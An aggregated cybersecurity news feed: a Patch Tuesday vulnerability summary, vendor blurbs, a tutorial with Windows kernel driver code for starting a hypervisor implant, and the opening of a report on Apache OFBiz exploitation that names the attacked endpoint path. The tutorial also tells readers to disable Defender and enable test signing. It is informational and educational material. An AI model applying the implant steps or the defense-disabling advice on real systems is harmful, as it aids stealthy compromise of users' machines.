Barracuda is proud to announce that it has signed the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Secure by Design Pledge, underlining our commitment to protecting small and medium-sized businesses across all sectors from complex cyberthreats.

by Barracuda

7Critical71Important1Moderate0LowMicrosoft addresses 79 CVEs with seven critical vulnerabilities and four zero-day vulnerabilities, including three that were exploited in the wild.Microsoft patched 79 CVEs in its September 2024 Patch Tuesday release, with seven rated critical, 71 rated as important, and one rated as moderate.This month’s update includes patches for:Azure CycleCloudAzure Network WatcherAzure StackAzure Web AppsDynamics Business CentralMicrosoft AutoUpdate (MAU)Microsoft Dynamics 365 (on-premises)Microsoft Graphics ComponentMicrosoft Management ConsoleMicrosoft Office ExcelMicrosoft Office PublisherMicrosoft Office SharePointMicrosoft Office VisioMicrosoft Outlook for iOSMicrosoft Streaming ServicePower AutomateRole: Windows Hyper-VSQL ServerWindows Admin CenterWindows AllJoyn APIWindows Authentication MethodsWindows DHCP ServerWindows InstallerWindows KerberosWindows Kernel-Mode DriversWindows LibarchiveWindows MSHTML PlatformWindows Mark of the Web (MOTW)Windows Network Address Translation (NAT)Windows Network VirtualizationWindows PowerShellWindows Remote Access Connection ManagerWindows Remote Desktop Licensing ServiceWindows Security Zone MappingWindows Setup and DeploymentWindows Standards-Based Storage Management ServiceWindows StorageWindows TCP/IPWindows UpdateWindows Win32K - GRFXWindows Win32K - ICOMPElevation of privilege (EoP) vulnerabilities accounted for 38% of the vulnerabilities patched this month, followed by remote code execution (RCE) vulnerabilities at 29.1%.CriticalCVE-2024-43491 | Microsoft Windows Update Remote Code Execution VulnerabilityCVE-2024-43491 is a RCE vulnerability in Microsoft Windows Update affecting Optional Components on Windows 10, version 1507 (Windows 10 Enterprise 2015 LTSB and Windows 10 IoT Enterprise 2015 LTSB). This was assigned a CVSSv3 score of 9.8, a maximum severity of critical and flagged by Microsoft as exploited in-the-wild.This vulnerability stems from how the Servicing stack handled the applicability of Optional Components as a result of a triggered code defect. This began with a security update released on March 12, 2024 - KB5035858 (OS Build 10240.20526). The affected Optional Components were flagged as “not applicable” and reverted to their Release To Manufacturing (RTM) version. Microsoft notes that only optional components enabled from the following list are affected:.NET Framework 4.6 Advanced Services \ ASP.NET 4.6Active Directory Lightweight Directory ServicesAdministrative ToolsInternet Explorer 11Internet Information Services\World Wide Web ServicesLPD Print ServiceMicrosoft Message Queue (MSMQ) Server CoreMSMQ HTTP SupportMultiPoint ConnectorSMB 1.0/CIFS File Sharing SupportWindows Fax and ScanWindows Media PlayerWork Folders ClientXPS ViewerSuccessful exploitation would result in the rollback of previously mitigated vulnerabilities in the affected optional components in Windows 10 versions as specified above.While this CVE has been labeled as exploited in-the-wild, confusingly Microsoft states that there is no evidence of direct exploitation of CVE-2024-43491,rather through observed rollbacks of CVEs related to Optional Components for Windows 10 (version 1507). Because some of these rolled back CVEs have been observed to have been exploited, this prompted Microsoft to apply the exploitability index assessment for this vulnerability as “Exploitation Detected.”ImportantCVE-2024-38217 | Windows Mark of the Web Security Feature Bypass VulnerabilityCVE-2024-38217 is a security feature bypass vulnerability affecting Mark of the Web, an identifier used by Windows to mark files that have been downloaded from the internet. With a CVSSv3 score of 5.4, Microsoft notes that it was exploited in the wild and publicly disclosed prior to the patch becoming available. Successful exploitation of this vulnerability requires an attacker to convince a user into opening a specially crafted file that could evade Mark of the Web (MOTW) defenses.Joe Desimone of Elastic Security published a blog post about the flaw in August, which includes an example of successful exploitation. The blog also highlights that Elastic Security ""identified multiple samples in VirusTotal that exhibit the bug"" with the oldest being submitted ""over 6 years ago,"" indicating potential exploitation as far back as 2018. An additional Mark of the Web security feature bypass vulnerability, CVE-2024-43487, was also patched this month. With a severity rating of moderate and a CVSSv3 score of 6.5, this flaw was rated as “Exploitation Less Likely” according to the Microsoft Exploitability Index. As with CVE-2024-38217, successful exploitation would involve the attacker convincing a user to open a specially crafted file.This is the second month in a row that a MOTW security feature bypass vulnerability was exploited in the wild as a zero-day, as Microsoft published an CVE-2024-38213 in August, though this flaw was originally patched as part of its June 2024 Patch Tuesday.ImportantCVE-2024-38014 | Windows Installer Elevation of Privilege VulnerabilityCVE-2024-38014 is an EoP vulnerability affecting Windows Installer which was observed as being exploited as a zero-day. While Microsoft did not share any details on exploitation, the advisory does note that successful exploitation would grant the attacker SYSTEM level privileges. As with other EoP vulnerabilities, these vulnerabilities are often used as part of post-compromise activity in order to further compromise a network using elevated account privileges.ImportantCVE-2024-38226 | Microsoft Publisher Security Features Bypass VulnerabilityCVE-2024-38226 is a security feature bypass vulnerability affecting Microsoft Publisher. This vulnerability was assigned a CVSSv3 score of 7.3 and has been exploited in the wild as a zero-day. In order to exploit this flaw, an attacker must be authenticated to a target system and convince a user to download a crafted file. This would allow a local attacker to bypass Office macro policies designed to block untrusted and potentially malicious files on the target’s system. According to the advisory, the Preview Pane is not an attack vector for this vulnerability.ImportantCVE-2024-26186, CVE-2024-26191, CVE-2024-37335, CVE-2024-37338, CVE-2024-37339 and CVE-2024-37340 | Microsoft SQL Server Native Scoring Remote Code Execution VulnerabilityCVE-2024-26186, CVE-2024-26191, CVE-2024-37335, CVE-2024-37338, CVE-2024-37339 and CVE-2024-37340 are a series of RCE vulnerabilities affecting Microsoft SQL Server Native Scoring. All six of these vulnerabilities are rated as important, were assigned a CVSSv3 score of 8.8, an exploitability index assessment of “Exploitation Less Likely” and were attributed to Andrew Ruddick with Microsoft Security Response Center.Microsoft''s FAQ for these vulnerabilities state “successful exploitation of this vulnerability requires an authenticated attacker to leverage SQL Server Native Scoring to apply pre-trained models to their data without moving it out of the database.” While the SQL Server vulnerabilities primarily enable unauthorized data manipulation, they could hypothetically lead to RCE if combined with additional security flaws or misconfigurations that allow SQL command execution.ImportantCVE-2024-37337, CVE-2024-37342 and CVE-2024-37966 | Microsoft SQL Server Native Scoring Information Disclosure VulnerabilityCVE-2024-37337, CVE-2024-37342 and CVE-2024-37966 are information disclosure vulnerabilities affecting Microsoft SQL Server Native Scoring. All three of these vulnerabilities are rated as important, and were assigned a CVSSv3 score of 7.1 and exploitability index assessment of “Exploitation Less Likely.” These CVEs are also attributed to Andrew Ruddick with Microsoft Security Response Center, bringing the Microsoft SQL Server Native Scoring CVE count to seven in September’s Patch Tuesday release, accounting for over 10% of the CVEs this month. Successful exploitation of this vulnerability by a threat actor with authenticated access to Microsoft SQL Server Native Scoring could potentially allow the reading of small portions of heap memory. The disclosed memory could contain sensitive data, including user credentials, session tokens, or application-level information, which may lead to further security risks.CriticalCVE-2024-38018 | Microsoft SharePoint Server Remote Code Execution VulnerabilityCVE-2024-38018 is a critical severity RCE affecting Microsoft SharePoint Server with a CVSSv3 score of 8.8 and an exploitability index assessment of “Exploitation More Likely.” While Microsoft has provided no information on exploitability, a threat actor would generally need to be authenticated and have sufficient permissions for page creation to take advantage of this RCE in Microsoft SharePoint Server.Tenable SolutionsA list of all the plugins released for Microsoft’s September 2024 Patch Tuesday update can be found here. As always, we recommend patching systems as soon as possible and regularly scanning your environment to identify those systems yet to be patched.For more specific guidance on best practices for vulnerability assessments, please refer to our blog post on How to Perform Efficient Vulnerability Assessments with Tenable.Get more informationMicrosoft''s September 2024 Security UpdatesTenable plugins for Microsoft September 2024 Patch Tuesday Security UpdatesJoin Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

Payment gateway provider Slim CD has notified 1.7 million users that their credit card information may have been leaked.

by Malwarebytes Labs

Pingora handles 35M+ requests per second, so saving a few microseconds per request can translate to thousands of dollars saved on computing costs. In this post, we share how we freed up over 500 CPU cores by optimizing one function and announce trie-hard, the open source crate that we created to do it.

by Cloudflare

For modern applications built on Kubernetes and microservices, platform engineering is not just about building functional systems but also about embedding security into the fabric of those systems.

by Dark Reading

Learn how threat actors can exploit SQL Server credential objects to escalate domain privileges and how you can detect it. The post Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation  appeared first on NetSPI.

by NetSPI

A challenging dynamic exists between the CISO and the Board of Directors. While both stakeholders focus on risk management, their... The post Enhancing CISO-Board communication: Three key questions for the CISO to answer appeared first on Sysdig.

by Sysdig

Episode 3: On September 11, 2019, two cybersecurity professionals were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their jobs. Gary De Mercurio and Justin Wynn. Despite the criminal charges against them eventually being dropped, the saga that night five years ago continues to haunt De Mercurio and Wynn personally and professionally. In this episode, the pair and Coalfire''s CEO Tom McAndrew share how the arrest and fallout has shaped their lives and careers as well as how it has transformed physical penetration tests for the cybersecurity industry as a whole.

by Dark Reading

Hypervisors are pieces of software used to manage VMs (Virtual Machines) or Guest machines on a Host machine. The main difference between a hypervisor and an emulator is that the former allows the guest machine to execute most instructions on the hardware of the host machine by translating the guest’s instructions into the native machine code of the host - this provides superior performance compared to emulators, especially when it comes to tasks that are computationally intensive. There are two main types of hypervisors: Bare-Metal: the software is installed directly on the host hardware, bypassing the host’s operating system (VMWare ESXi, KVM, MS Hyper-V, …) So the execution order is: UEFI / BIOS → Hypervisor → OS executed by the Hypervisor Hosted: the hypervisor runs as an application on top of a host OS (VirtualBox, VMware Workstation, …) In this case, the execution order is: UEFI / BIOS → Host OS → Hypervisor loaded by the Host OS → Guest OS As I lately started getting into kernel development, I ran into some posts talking about how it’s possible to develop hypervisor implants - what intrigues me the most is the fact that if an attacker were to establish kernel-level access on a Windows machine with something like a kernel driver, other drivers could abuse the fact that kernel memory is shared to examine the vulnerable driver or rootkit used by the attacker. However, when it comes to Hypervisors, once the software itself is loaded into memory and it starts using the virtualization extensions for the CPU it’s built for, it’s virtually possible to hide any memory related to the Hypervisor from the Host OS. This “feature” is, of course, used legitimately by solutions like Credential Guard: a security feature introduced by Microsoft to protect user credentials from theft or compromise - the products works in conjunction with hypervisors to create a secure, isolated environment for storing and processing sensitive authentication data. This is an example of VBS (Virtualization-based security). CG (Credential Guard) leverages hardware-based security features to isolate sensitive data such as “NTLM hashes, TGTs and other kinds of credentials stored applications as domain credentials”. If you want to look at how hypervisor code might look like, I highly suggest looking at SimpleVisor, its entrypoint and the wiki. Some examples of the before-mentioned articles are: New Malware Families Found Targeting VMware ESXi Hypervisors Ransomware operators exploit ESXi hypervisor vulnerability for mass encryption Protect Your Organization from MosaicRegressor and Other UEFI Implants — The first thing someone might notice is that installing an additional (and malicious) hypervisor on a guest OS that is already running on an underlying hypervisor might now work as hardware only supports having one hypervisor active. This setup will still be possible as the first hypervisor will extend the support by “emulating” the hardware’s functionality. This means that the first hypervisor has to be able to forward hardware instructions from the CPU to the malicious hypervisor, effectively acting as a middle-man. With that out of the way we can start implementing a basic driver for Windows: to do that you’ll have to set up your VM by installing WDK. Then you’ll have to enable Test Signing mode and reboot the machine bcdedit /debug on bcdedit /set testsigning on Setting up a simple driver In order to see the debug messages from the driver you will also need to open regedit, navigate to HKLM\SYSTEM\CurrentControlSet\Control\Session Manager and create a new Key called Debug Print Filter. Within that, add a new DWORD Value and give it the name DEFAULT and a value of 8. You might also need to disable MS Defender and anti-tampering mode. Now you can open Visual Studio and create a new Kernel Mode Driver, Empty (KMDF) and add the following boilerplate code (the macros.h file contains some macros for debug printing and can be found here) #include <ntddk.h> #include ""macros.h"" void DriverUnload(PDRIVER_OBJECT DriverObject) { UNREFERENCED_PARAMETER(DriverObject); SUCCESS(""Driver successfully unloaded\n""); } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { UNREFERENCED_PARAMETER(RegistryPath); DriverObject->DriverUnload = DriverUnload; SUCCESS(""Driver successfully loaded\n""); return STATUS_SUCCESS; } This simply defines the DriverEntry / DriverUnload functions, which are responsible for loading and unloading the driver from memory, and printing some debugging messages in the process. Now we can create the service for the driver, start it and stop it at will and we’ll be able to see it load & unload from memory with a tool like DebugView. sc create hypervisor binPath= C:\Users\otter\Desktop\projects\hypervisor\x64\Debug\hypervisor.sys type= kernel sc start hypervisor sc stop hypervisor Interacting with the CPU Since we’ll need to talk to the hardware components directly, the code we write will be brand-specific as CPUs of different brands (Intel, AMD, …) have different register structures and instruction sets. In this case, I’m working with an Intel processor so I will be using the official Intel 64 and IA-32 Architectures Software Developer’s Manual. Before the driver loads into memory, we will need to perform some checks to enumerate the state of Intel’s Virtualization Technology, or Intel-VTx, component. VTx is a fundamental component for any hypervisor as it allows the software to use CPU extensions for virtualization purposes so we need to check for whether the feature is enabled on the CPU. In our case, we’ll focus on VMX, the Virtual Machine Monitor Extension: a specific implementation of VT-x that provides the tools and mechanisms for hypervisors to create and manage virtual machines. Part of these properties can be also enumerated with commands like systeminfo, but if you run it on a VM you’ll only get a message along the lines of systeminfo ... Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. Looking at page 3925 of the manual we’ll find the Discovering Support for VMX Before system software enters into VMX operation, it must discover the presence of VMX support in the processor. System software can determine whether a processor supports VMX operation using CPUID. If CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported. So it’s possible for us to enumerate the VMX state by issuing a CPUID instruction to the CPU and checking the 5th bit of the result found in the ECX register, if the bit is 1 then VMX is enabled, otherwise the feature is disabled. What does the CPUID instruction do? Heading to page 803 we find the CPUID - CPU Identification section where the CPUID instruction is described as Returns processor identification and feature information to the EAX, EBX, ECX, and EDX registers, as determined by input entered in EAX (in some cases, ECX as well). and looking at the implementation of the instruction we see that if EAX contains 0x1 when the instruction is called, ECX will contain the VMX-related information at bit 5, just like the first paragraph mentioned (shocker, I know). Setting up the driver for virtualization Now we can implement this instruction in our driver, call it, and check the 5th bit of the ECX register is set to 1. The following is the complete code with the instruction implementation and the check for VMX. #include <ntddk.h> #include <intrin.h> #include ""macros.h"" /* this function is a helper for the CPUID instruction using the __cpuid intrinsic function @note originally, the return registers are stored in a 4-element array, but we are only interested in the EBX, ECX, and EDX registers so we''ll use pointers to store the values @param UINT32 eax: the value to be passed to the EAX register @param UINT32* ebx: the value to be returned by the CPUID instruction in the EBX register @param UINT32* ecx: the value to be returned by the CPUID instruction in the ECX register @param UINT32* edx: the value to be returned by the CPUID instruction in the EDX register @reference https://learn.microsoft.com/en-us/cpp/intrinsics/cpuid-cpuidex?view=msvc-170 */ void cpuid(UINT32 eax, UINT32* ebx, UINT32* ecx, UINT32* edx) { int cpuInfo[4]; __cpuid(cpuInfo, eax); *ebx = cpuInfo[1]; *ecx = cpuInfo[2]; *edx = cpuInfo[3]; } /* this function checks if the fifth bit of the ECX register is 1 to enumerate whether VMX is supported by the CPU @param UINT32 eax: the value to be passed to the EAX register @return BOOLEAN: TRUE if the fifth bit of the ECX register is 1, FALSE otherwise */ BOOLEAN checkFifthBit(UINT32 eax) { UINT32 ebx, ecx, edx; cpuid(eax, &ebx, &ecx, &edx); return (ecx & 0x20) != 0; } void DriverUnload(PDRIVER_OBJECT DriverObject) { UNREFERENCED_PARAMETER(DriverObject); SUCCESS(""Driver successfully unloaded\n""); } NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { UNREFERENCED_PARAMETER(RegistryPath); DriverObject->DriverUnload = DriverUnload; SUCCESS(""Driver successfully loaded\n""); // verify whether the CPU supports VMX // by checking the fifth bit of the ECX register // after the CPUID instruction is executed with EAX = 0x1 if (checkFifthBit(0x1)) { SUCCESS(""VMX is supported by the target CPU\n""); } else { ERROR(""VMX is not supported by the target CPU\n""); return STATUS_FAILED_DRIVER_ENTRY; } return STATUS_SUCCESS; } Mind the @note line in the comment for the cpuid wrapper function: for most, if not all, of the functionalities we will implement there is a more “official” way of handling things by declaring a type for each register and describing its structure and the purpose of each bit like so typedef union _IA32_FEATURE_CONTROL_MSR { ULONG64 All; struct { ULONG64 Lock : 1; ULONG64 EnableSMX : 1; ULONG64 EnableVmxon : 1; ULONG64 Reserved2 : 5; ULONG64 EnableLocalSENTER : 7; ULONG64 EnableGlobalSENTER : 1; ULONG64 Reserved3a : 16; ULONG64 Reserved3b : 32; } Fields; } IA32_FEATURE_CONTROL_MSR, *PIA32_FEATURE_CONTROL_MSR; typedef struct _CPUID { int eax; int ebx; int ecx; int edx; } CPUID, *PCPUID; So if you’re following along you might want to look into implementing these types and structures. As you can see from the debug prints and the code, I made it so the driver won’t load properly if VMX is not supported as it would make no sense going through with the driver entry function when the CPU we’re targeting cannot be exploited. In this case, my VM didn’t have virtualization enabled so the check “fails successfully”. I’m using VirtualBox so to enable it go to Settings > System > Enable Nested VT-x/AMD-V. If the option is grayed-out, turn off the VM and execute VBoxManage modifyvm <vm_name> --nested-hw-virt on; this should select the box and allow for nested virtualization. Another basic check we could run consists in running CPUID with EAX set to 0x0, this allows us to verify whether the CPU we’re attacking is an Intel CPU; if it is the values in the EBX, EDX and ECX registers (in that order) should spell the string GenuineIntel if decoded from hex and read in LE format, this is known as the “manufacturer string”. This is the code to implement it /* check whether we''re working with an intel CPU by calling the CPUID instruction with EAX = 0x0 and checking the EBX, ECX, and EDX registers for the manufacturer string @return BOOLEAN: TRUE if the CPU is an Intel CPU, FALSE otherwise */ BOOLEAN isIntelCPU() { UINT32 ebx, ecx, edx; cpuid(0x0, &ebx, &ecx, &edx); return ebx == ''uneG'' && edx == ''Ieni'' && ecx == ''letn''; } So we can add a simple if / else check in the DriverEntry function just like we did with the VMX check and we should get something along these lines Now we are sure that we are working on an Intel CPU and VMX is supported so we are free to start setting up the structure for VM control: as the manual states, the hypervisor can enter VMX operation only by setting the 13th bit of the CR4 register to 1 (CR4.VMXE[bit 13] = 1), after this is set the system enters VMX operation by executing the VMXON instruction. VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are: Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both (see below), as well as the lock bit. Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions. Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions Since it’s not the BIOS setting bits in the register, we’ll have to set the lock bit and then bit 1, bit 2, or both. In this specific case we’ll be operating outside SMX so we only need to set the lock bit and bit 1. So to move on we’ll need some functions to read and write values from MSR register, thankfully we can use the intrinsic functions to write a quick (and somewhat useless) wrapper /* read the value from a MSR register @param UINT32 msr: the MSR register to be read @return UINT64: the value stored in the MSR register @reference https://learn.microsoft.com/en-us/cpp/intrinsics/readmsr?view=msvc-170 */ UINT64 readMSR(UINT32 msr) { return __readmsr(msr); } /* write a value to a MSR register @param UINT32 msr: the MSR register to be written to @param UINT64 value: the value to be written to the MSR register @reference https://learn.microsoft.com/en-us/cpp/intrinsics/writemsr?view=msvc-170 */ void writeMSR(UINT32 msr, UINT64 value) { __writemsr(msr, value); } Now that we have the helper functions we can run the checks we need #define IA32_FEATURE_CONTROL 0x3A ... /* check if the lock bit is set in the IA32_FEATURE_CONTROL MSR register @return BOOLEAN: TRUE if the lock bit is set, FALSE otherwise */ BOOLEAN isLockBitSet() { UINT64 featureControl = readMSR(IA32_FEATURE_CONTROL); return (featureControl & 0x1) != 0; } /* check if the VMXON outside SMX bit is set in the IA32_FEATURE_CONTROL MSR register @return BOOLEAN: TRUE if the VMXON outside SMX bit is set, FALSE otherwise */ BOOLEAN isVmxonEnabledOutsideSMX() { UINT64 featureControl = readMSR(IA32_FEATURE_CONTROL); return (featureControl & 0x4) != 0; } Another step we need to take to prepare for the VMXON instruction is allocating what’s known as a VMXON Region: a 4k-byte aligned memory area used by the CPU to support the VMX operation. Before executing VMXON, software allocates a region of memory (called the VMXON region) that the logical processor uses to support VMX operation. The physical address of this region (the VMXON pointer) is provided in an operand to VMXON. The VMXON pointer is subject to the limitations that apply to VMCS pointers: The VMXON pointer must be 4-KByte aligned (bits 11:0 must be zero). The VMXON pointer must not set any bits beyond the processor’s physical-address width. Before executing VMXON, software should write the VMCS revision identifier to the VMXON region. (Specifically, it should write the 31-bit VMCS revision identifier to bits 30:0 of the first 4 bytes of the VMXON region; bit 31 should be cleared to 0.) It need not initialize the VMXON region in any other way. Software should use a separate region for each logical processor and should not access or modify the VMXON region of a logical processor between execution of VMXON and VMXOFF on that logical processor. Doing otherwise may lead to unpredictable behavior This process seems incredibly tedious to do in C, thankfully we can use some of the intrinsic functions the Windows API provides for the VMXON instruction (using __vmx_on()). The VMXON region should be zeroed prior to executing VMXON, and the VMCS revision identifier written into the VMXON region at the appropriate offset. Byte OffsetContents 0Buts 31:0 VMCS revision identifier 4VMXON data Byte OffsetContents 0Bits 30:0 VMCS revision identifier 4VMX-abort indicator 8VMCS data For simplicity’s sake, we’ll only be allocating a single VMXON region, and the respective VMCS region, for only one CPU core. In order to keep track of where the regions are I made a simple structure that represents the state of an individual Virtual Machine by storing the pointers for both the VMXON and VMCS regions. typedef struct VM_STATE { UINT64 vmxonRegion; UINT64 vmcsRegion; } VM_STATE, *PVM_STATE; // global value for the VM state VM_STATE guestVmState; This is the allocateVmxonRegion function I made to allocate the VMXON region as a continuous 4k-byte aligned memory region. #define IA32_FEATURE_CONTROL 0x3A #define IA32_VMX_BASIC 0x480 #define VMXON_REGION_SIZE 0x1000 #define VMCS_REGION_SIZE 0x1000 #define ALIGNMENT 0x1000 typedef struct VM_STATE { UINT64 vmxonRegion; UINT64 vmcsRegion; } VM_STATE, *PVM_STATE; typedef union _IA32_VMX_BASIC_MSR { ULONG64 All; struct { ULONG32 RevisionIdentifier : 31; ULONG32 Reserved1 : 1; ULONG32 RegionSize : 12; ULONG32 RegionClear : 1; ULONG32 Reserved2 : 3; ULONG32 SupportedIA64 : 1; ULONG32 SupportedDualMoniter : 1; ULONG32 MemoryType : 4; ULONG32 VmExitReport : 1; ULONG32 VmxCapabilityHint : 1; ULONG32 Reserved3 : 8; } Fields; } IA32_VMX_BASIC_MSR, *PIA32_VMX_BASIC_MSR; ... /* returns the physical address of a virtual address @param UINT64 virtualAddress: the virtual address to be converted to a physical address @return UINT64: the physical address of the virtual address @reference https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-mmgetphysicaladdress */ UINT64 getPhysicalAddress(UINT64 virtualAddress) { PHYSICAL_ADDRESS physicalAddress = MmGetPhysicalAddress((PVOID)virtualAddress); return physicalAddress.QuadPart; } /* allocate and load the VMXON region using the __vmx_on intrinsic function @param VM_STATE* guestVmState: the VM state of the guest @return BOOLEAN: TRUE if the VMXON region is successfully allocated, FALSE otherwise */ BOOLEAN allocateVmxonRegion(IN VM_STATE* vmState) { // if the current IRQL is greater than DISPATCH_LEVEL, raise it to DISPATCH_LEVEL // to avoid any potential issues with the memory allocation if (KeGetCurrentIrql() > DISPATCH_LEVEL) { KeRaiseIrqlToDpcLevel(); } PHYSICAL_ADDRESS maxPhysicalAddress = { 0 }; maxPhysicalAddress.QuadPart = MAXULONG64; // use mmallocatecontiguousmemory to allocate a contiguous region of memory // for the VMXON instruction making sure that the memory is aligned to a 4KB boundary int sizeOfVmxonRegion = 2 * VMXON_REGION_SIZE; PVOID vmxRegionBuffer = MmAllocateContiguousMemory(sizeOfVmxonRegion + ALIGNMENT, maxPhysicalAddress); PHYSICAL_ADDRESS highestAddress = { 0 }; highestAddress.QuadPart = ~0; if (vmxRegionBuffer == NULL) { ERROR(""Failed to allocate the VMXON region\n""); return FALSE; } UINT64 physicalAddress = getPhysicalAddress((UINT64)vmxRegionBuffer); // check if the VMXON region is successfully allocated if (physicalAddress == 0) { ERROR(""Failed to get the physical address of the VMXON region\n""); return FALSE; } // zero out the allocated region RtlSecureZeroMemory(vmxRegionBuffer, sizeOfVmxonRegion + ALIGNMENT); // align the VMXON region to a 4KB boundary UINT64 alignedPhysicalBuffer = (UINT64)((ULONG_PTR)(physicalAddress + ALIGNMENT - 1) & ~(ALIGNMENT - 1)); UINT64 alignedVirtualBuffer = (UINT64)((ULONG_PTR)((PUCHAR)vmxRegionBuffer + ALIGNMENT - 1) & ~(ALIGNMENT - 1)); INFO(""Allocated VMXON region with an aligned virtual buffer from %llx\n"", alignedVirtualBuffer); // get the IA32_VMX_BASIC MSR register value IA32_VMX_BASIC_MSR vmxBasicMsr; vmxBasicMsr.All = readMSR(IA32_VMX_BASIC); // change the revision identifier *(UINT64*)alignedVirtualBuffer = vmxBasicMsr.Fields.RevisionIdentifier; // load the VMXON region using the __vmx_on intrinsic function int returnValue = __vmx_on(&alignedPhysicalBuffer); if (returnValue) { ERROR(""Failed to load the VMXON region\n""); return FALSE; } // update the VM state with the VMXON region vmState->vmxonRegion = alignedPhysicalBuffer; return TRUE; } I used MmAllocateContiguousMemory to allocate the contiguous and non-paged physical memory for the region for two main reasons: We don’t have to pick a cache type for the allocated memory The starting address of the allocated buffer is aligned by default to a memory page boundary After we call MmAllocateContiguousMemory, the VMXON region is completely uninitialized so we have to zero it using a macro like RtlSecureZeroMemory. The next part of the function addresses the revision identifier Before executing VMXON, software should write the VMCS revision identifier to the VMXON region. by reading the identifier from the IA32_VMX_BASIC_MSR register and writing it into the VMXON region; now we’re ready to use the __vmx_on and checking its result: if it’s 0, the operation succeeded and we can update the vmxonRegion pointer in the VM_STATE structure we defined earlier. The last thing we will do in this post is allocating and initializing the VMCS region to complete the VM_STATE setup; the responsible code will be pretty much the same as the requirements are shared between the two memory regions, the only difference is that we’ll be replacing the __vmx_on() function with the __vmx_vmptrld() intrinsic function which “Loads the pointer to the current virtual-machine control structure (VMCS) from the specified address”. /* allocate and load the VMCS region using the __vmx_vmclear intrinsic function @param VM_STATE* guestVmState: the VM state of the guest @return BOOLEAN: TRUE if the VMCS region is successfully allocated, FALSE otherwise @reference https://learn.microsoft.com/en-us/cpp/intrinsics/vmx-vmptrld?view=msvc-170 */ BOOLEAN allocateVmcsRegion(IN VM_STATE* vmState) { // if the current IRQL is greater than DISPATCH_LEVEL, raise it to DISPATCH_LEVEL // to avoid any potential issues with the memory allocation if (KeGetCurrentIrql() > DISPATCH_LEVEL) { KeRaiseIrqlToDpcLevel(); } PHYSICAL_ADDRESS maxPhysicalAddress = { 0 }; maxPhysicalAddress.QuadPart = MAXULONG64; // use mmallocatecontiguousmemory to allocate a contiguous region of memory // for the VMCS instruction making sure that the memory is aligned to a 4KB boundary int sizeOfVmcsRegion = 2 * VMCS_REGION_SIZE; PVOID vmcsRegionBuffer = MmAllocateContiguousMemory(sizeOfVmcsRegion + ALIGNMENT, maxPhysicalAddress); PHYSICAL_ADDRESS highestAddress = { 0 }; highestAddress.QuadPart = ~0; if (vmcsRegionBuffer == NULL) { ERROR(""Failed to allocate the VMCS region\n""); return FALSE; } UINT64 physicalAddress = getPhysicalAddress((UINT64)vmcsRegionBuffer); // check if the VMCS region is successfully allocated if (physicalAddress == 0) { ERROR(""Failed to get the physical address of the VMCS region\n""); return FALSE; } // zero out the allocated region RtlSecureZeroMemory(vmcsRegionBuffer, sizeOfVmcsRegion + ALIGNMENT); // align the VMCS region to a 4KB boundary UINT64 alignedPhysicalBuffer = (UINT64)((ULONG_PTR)(physicalAddress + ALIGNMENT - 1) & ~(ALIGNMENT - 1)); UINT64 alignedVirtualBuffer = (UINT64)((ULONG_PTR)((PUCHAR)vmcsRegionBuffer + ALIGNMENT - 1) & ~(ALIGNMENT - 1)); INFO(""Allocated VMCS region with an aligned virtual buffer from %llx\n"", alignedVirtualBuffer); // get the IA32_VMX_BASIC MSR register value IA32_VMX_BASIC_MSR vmcsBasicMsr; vmcsBasicMsr.All = readMSR(IA32_VMX_BASIC); // change the revision identifier *(UINT64*)alignedVirtualBuffer = vmcsBasicMsr.Fields.RevisionIdentifier; // load the VMXON region using the __vmx_vmptrld intrinsic function int returnValue = __vmx_vmptrld(&alignedPhysicalBuffer); if (returnValue) { ERROR(""Failed to load the VMCS region\n""); return FALSE; } // update the VM state with the VMCS region vmState->vmcsRegion = alignedPhysicalBuffer; return TRUE; } This is all I’m gonna cover in this post; thanks for sticking around until the end <3 ʕ •ᴥ•ʔ Read more at: https://otter.gitbook.io/

by HACKLIDO

Overview On September 7, 2024, Cyble Global Sensor Intelligence (CGSI) identified the active exploitation of CVE-2024-32113, a critical path traversal vulnerability in the Apache OFBiz open-source enterprise resource planning (ERP) system. This flaw was initially addressed on April 12, 2024, with a formal patch released on May 8, 2024. CVE-2024-32113 allows Threat Actors (TAs) to execute arbitrary commands by sending specially crafted requests, enabling them to gain unauthorized access and execute arbitrary commands. On September 4, 2024, the identification of CVE-2024-45195 reignited concerns surrounding Apache OFBiz by revealing a bypass for several previously addressed vulnerabilities, notably CVE-2024-32113. This development has intensified the exploitation of CVE-2024-32113, as attackers exploit the flaw''s resurgence to compromise vulnerable systems and deploy malicious payloads. Researchers also observed active exploitation of this vulnerability to deploy the Mirai botnet on the compromised systems. Cyble Global Sensor Intelligence (CGSI) findings Cyble Global Sensor Intelligence (CGSI) detected exploitation attempts of CVE-2024-32113 on September 4, 2024. In the instances recorded by CGSI, as illustrated in the figure below, an attacker attempted to access the endpoint /webtools/control/forgotPassword;/ProgramExport through a POST request. Figure 1 - Screenshot of exploitation attempts observed via CGSI network Vulnerability Details Remote Code Execution CVE-2024-32113 CVSSv3.1 9.1 Severity Critical Vulnerable Software Versions Apache OFBi versions before 18.12.13 Description The affected versions of the Apache OFBiz system contain a Path Traversal vulnerability due to improper limitation of pathnames to restricted directory. Overview of the Exploit The vulnerability arises from a fragmented state between the application''s current controller and view map due to the use of different parsing methods for incoming URI patterns. When attackers send 